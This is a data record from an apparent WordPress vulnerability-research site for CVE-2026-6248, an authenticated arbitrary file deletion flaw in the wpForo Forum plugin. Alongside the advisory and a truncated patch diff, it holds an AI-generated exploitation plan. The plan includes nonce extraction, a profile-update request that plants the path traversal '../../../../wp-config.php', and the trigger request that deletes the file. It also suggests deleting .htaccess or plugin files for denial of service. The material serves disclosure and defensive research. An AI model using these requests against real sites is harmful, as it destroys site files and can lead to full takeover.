[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwNBrm2dyjODNUESYOMk6V3rETO2DwDVY_5pdwYgKXgk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-6248","wpforo-forum-authenticated-subscriber-arbitrary-file-deletion-via-custom-profile-field-file-path","wpForo Forum \u003C= 3.0.5 - Authenticated (Subscriber+) Arbitrary File Deletion via Custom Profile Field File Path","The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.5. This is due to two compounding flaws: the Members::update() method does not validate or restrict the value of file-type custom profile fields, allowing authenticated users to store an arbitrary path instead of a legitimate upload path; and the wpforo_fix_upload_dir() sanitization function in ucf_file_delete() only remaps paths that match the expected pattern, and it is passed directly to the unlink() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). Note: The vulnerability requires a file custom field, which requires the wpForo - User Custom Fields addon plugin.","wpforo",null,"\u003C=3.0.5","3.0.6","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-20 05:51:32","2026-04-20 18:31:33",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F79cc102a-6777-41be-a395-8c2eeb6deb73?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fai-features.css","admin\u002Fassets\u002Fjs\u002Fai-features.js","admin\u002Fpages\u002Ftabs\u002Fai-features-helpers.php","admin\u002Fpages\u002Ftabs\u002Fai-features-tab-ai-tasks.php","admin\u002Fpages\u002Ftabs\u002Fai-features-tab-rag-indexing.php","assets\u002Fjs\u002Fai-features.js","classes\u002FAIClient.php","classes\u002FActions.php","researched",false,3,"This exploitation research plan targets **CVE-2026-6248**, an authenticated arbitrary file deletion vulnerability in the **wpForo Forum** plugin. The vulnerability stems from a path traversal flaw when handling custom profile fields, combined with a failure to sanitize the file path before passing it to `unlink()`.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') leading to Arbitrary File Deletion.\n*   **Location:** `Members::update()` (storage logic) and `Actions::ucf_file_delete()` (deletion logic).\n*   **Condition:** Requires the **wpForo - User Custom Fields** addon to be active, as it enables the file-type custom profile fields used in the exploit.\n*   **Root Cause:** \n    1.  `Members::update()` allows saving arbitrary strings into custom fields of type \"file\" without path validation.\n    2.  `Actions::ucf_file_delete()` retrieves this string from the database.\n    3.  The path is passed to `wpforo_fix_upload_dir()`, which only sanitizes the path if it matches a specific expected upload pattern. If it doesn't match (e.g., uses traversal), the malicious path survives and is passed directly to `unlink()`.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (for AJAX triggers) or the main forum page with `wpfaction` query parameters.\n*   **Action 1 (Injection):** `wpfaction=profile_update`\n*   **Action 2 (Trigger):** `wpfaction=ucf_file_delete`\n*   **Authentication:** Subscriber-level user (or any authenticated user with a profile).\n*   **Precondition:** A custom \"File\" field must be defined in the wpForo User Custom Fields settings.\n\n### 3. Code Flow\n1.  **Entry Point (Injection):** User sends a POST request with `wpfaction=profile_update`.\n2.  **Logic (Injection):** `Actions::do_actions()` (in `classes\u002FActions.php`) calls `do_action('wpforo_action_profile_update')`, which executes `Actions::profile_update()`.\n3.  **Storage:** `Actions::profile_update()` calls `Members::update()`. `Members::update()` fails to validate that the input for \"file\" type fields is a legitimate relative upload path, saving `..\u002F..\u002F..\u002F..\u002Fwp-config.php` into the `wp_wpforo_profiles` table or user meta.\n4.  **Entry Point (Deletion):** User sends a request with `wpfaction=ucf_file_delete&field=FIELD_NAME`.\n5.  **Logic (Deletion):** `Actions::do_actions()` calls `do_action('wpforo_action_ucf_file_delete')`, executing `Actions::ucf_file_delete()`.\n6.  **Path Retrieval:** `ucf_file_delete()` retrieves the malicious string from the database based on the `field` parameter and the current user's ID.\n7.  **Sanitization Bypass:** The path is passed to `wpforo_fix_upload_dir()`. Because the path starts with `..\u002F` and doesn't match the expected wpForo upload structure, the remapping logic is skipped.\n8.  **Sink:** The raw traversal path is passed to `unlink()`, deleting the target file (e.g., `wp-config.php`).\n\n### 4. Nonce Acquisition Strategy\nwpForo uses a nonce for profile updates and forum actions, typically localized in the `wpforo` or `wpforo_ajax` JavaScript objects.\n\n1.  **Identify Shortcode:** The standard wpForo shortcode is `[wpforo]`.\n2.  **Setup Page:** Use WP-CLI to create a page containing the forum:\n    ```bash\n    wp post create --post_type=page --post_title=\"Forum\" --post_status=publish --post_content='[wpforo]'\n    ```\n3.  **Navigate and Extract:**\n    *   Log in as a Subscriber.\n    *   Navigate to the newly created \"Forum\" page.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Check standard wpforo object\n        window.wpforo?.nonce || window.wpf_ajax?.nonce\n        ```\n    *   Verification: `Actions.php` refers to `wpf_nonce` and `_wpnonce` in various contexts. In the `ucf_file_delete` and `profile_update` actions, wpForo usually expects the nonce in the `_wpnonce` or `wpf_nonce` parameter.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Identify Custom Field Key\nThe custom field key is required (e.g., `field_123`). This can be found by inspecting the profile edit form or via WP-CLI:\n```bash\nwp db query \"SELECT * FROM wp_wpforo_fields WHERE type='file'\"\n```\n\n#### Step 2: Inject Malicious Path (Profile Update)\n**Request:**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Findex.php?wpfaction=profile_update`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    _wpnonce=[NONCE]&member[FIELD_KEY]=..\u002F..\u002F..\u002F..\u002Fwp-config.php&member[user_nicename]=victim\n    ```\n    *(Note: Replace `FIELD_KEY` with the actual field key, e.g., `ucf_file_1`)*\n\n#### Step 3: Trigger File Deletion\n**Request:**\n*   **Method:** GET (or POST)\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Findex.php?wpfaction=ucf_file_delete&field=[FIELD_KEY]&_wpnonce=[NONCE]`\n*   *(Note: The plugin retrieves the current user's ID automatically in `ucf_file_delete`)*\n\n### 6. Test Data Setup\n1.  **Install wpForo:** Ensure wpForo \u003C= 3.0.5 is installed.\n2.  **Simulate Addon:** The User Custom Fields addon is required. For the PoC, manually insert a \"file\" type field into the wpForo fields table:\n    ```bash\n    wp db query \"INSERT INTO wp_wpforo_fields (fieldid, name, title, type, is_editable) VALUES (999, 'traversal_field', 'Exploit Field', 'file', 1)\"\n    ```\n3.  **Create User:** Create a Subscriber user.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n    ```\n\n### 7. Expected Results\n*   The `profile_update` request should return a redirect or a success message.\n*   The `ucf_file_delete` request should return a success message or redirect.\n*   The file `wp-config.php` at the site root should be deleted from the filesystem.\n\n### 8. Verification Steps\n1.  **Check Meta\u002FDB:** Confirm the malicious string was saved:\n    ```bash\n    wp db query \"SELECT * FROM wp_wpforo_profiles WHERE userid=[USER_ID]\"\n    ```\n2.  **Verify Deletion:** Check if `wp-config.php` exists:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php\n    ```\n    (A successful exploit will result in \"No such file or directory\").\n\n### 9. Alternative Approaches\n*   **Direct Meta Injection:** If `profile_update` is restricted, check if other user update hooks are vulnerable.\n*   **Path Depth:** If the default upload directory depth varies, increase the number of `..\u002F` sequences (e.g., `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fwp-config.php`).\n*   **Targeting Other Files:** If `wp-config.php` is protected by file permissions, attempt to delete `.htaccess` or files in `wp-content\u002Fplugins\u002F` to cause a Denial of Service or trigger plugin deactivation.","The wpForo Forum plugin is vulnerable to arbitrary file deletion because it fails to validate file paths in custom profile fields and doesn't properly sanitize those paths before calling unlink(). Authenticated attackers with subscriber-level access can exploit this to delete sensitive files like wp-config.php, potentially leading to remote code execution.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforo\u002F3.0.5\u002Fadmin\u002Fassets\u002Fcss\u002Fai-features.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforo\u002F3.0.6\u002Fadmin\u002Fassets\u002Fcss\u002Fai-features.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforo\u002F3.0.5\u002Fadmin\u002Fassets\u002Fcss\u002Fai-features.css\t2026-04-13 13:06:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforo\u002F3.0.6\u002Fadmin\u002Fassets\u002Fcss\u002Fai-features.css\t2026-04-19 10:24:32.000000000 +0000\n@@ -2578,9 +2578,39 @@\n \tflex: 1;\n }\n \n-\u002F* Form Actions *\u002F\n+\u002F* Form Actions - Two Column Layout (Clear | Index) *\u002F\n .wpforo-ai-ingest-column .form-actions {\n \tmargin-top: 20px;\n+\tdisplay: flex !important;\n+\tflex-wrap: wrap;\n+\tgap: 10px;\n+\tjustify-content: space-between !important;\n+}\n+\n+\u002F* Clear Forum Button - Red Destructive Styling *\u002F\n+.wpforo-ai-ingest-column .form-actions button.button.wpforo-ai-clear-forum-btn,\n+.wpforo-ai-ingest-column .form-actions .button.wpforo-ai-clear-forum-btn,\n+button.button.wpforo-ai-clear-forum-btn {\n+\tbackground: #fff !important;\n+\tbackground-color: #fff !important;\n+\tborder-color: #d63638 !important;\n+\tcolor: #d63638 !important;\n+}\n+\n+.wpforo-ai-ingest-column .form-actions button.button.wpforo-ai-clear-forum-btn:hover,\n+.wpforo-ai-ingest-column .form-actions button.button.wpforo-ai-clear-forum-btn:focus,\n+.wpforo-ai-ingest-column .form-actions .button.wpforo-ai-clear-forum-btn:hover,\n+.wpforo-ai-ingest-column .form-actions .button.wpforo-ai-clear-forum-btn:focus,\n+button.button.wpforo-ai-clear-forum-btn:hover,\n+button.button.wpforo-ai-clear-forum-btn:focus {\n+\tbackground: #fcf0f1 !important;\n+\tbackground-color: #fcf0f1 !important;\n+\tborder-color: #d63638 !important;\n+\tcolor: #d63638 !important;\n+}\n+\n+.wpforo-ai-clear-forum-btn .dashicons {\n+\tcolor: inherit !important;\n }\n \n .wpforo-ai-ingest-column .form-row {\n@@ -2619,6 +2649,10 @@\n \tfont-size: 14px;\n }\n \n+.wpforo-ai-forum-ingest-form .form-actions .button-large{\n+\twidth: 49%;\n+}\n+\n \u002F* Responsive *\u002F\n @media screen and (max-width: 1200px) {\n \t.wpforo-ai-ingest-grid {\n... (truncated)","1. Authenticate as a Subscriber-level user (or any role with profile editing access).\n2. Identify a custom 'File' type field in the wpForo profile settings (this requires the 'wpForo - User Custom Fields' addon to be active).\n3. Inject a malicious path by sending a POST request to the 'profile_update' action (e.g., `?wpfaction=profile_update`). The payload should contain a path traversal string like `..\u002F..\u002F..\u002F..\u002Fwp-config.php` in the custom field parameter.\n4. Extract a valid nonce from the forum page, usually found in the `wpforo.nonce` or `wpf_ajax.nonce` JavaScript objects.\n5. Trigger the file deletion by sending a request to the `ucf_file_delete` action (e.g., `?wpfaction=ucf_file_delete&field=FIELD_KEY&_wpnonce=NONCE`).\n6. The plugin will retrieve the stored traversal string from the database and pass it directly to the PHP unlink() function via the ucf_file_delete() method, bypassing insufficient sanitization in wpforo_fix_upload_dir().","gemini-3-flash-preview","2026-04-20 13:07:27","2026-04-20 13:08:08",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","3.0.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags\u002F3.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforo.3.0.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags\u002F3.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforo.3.0.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags"]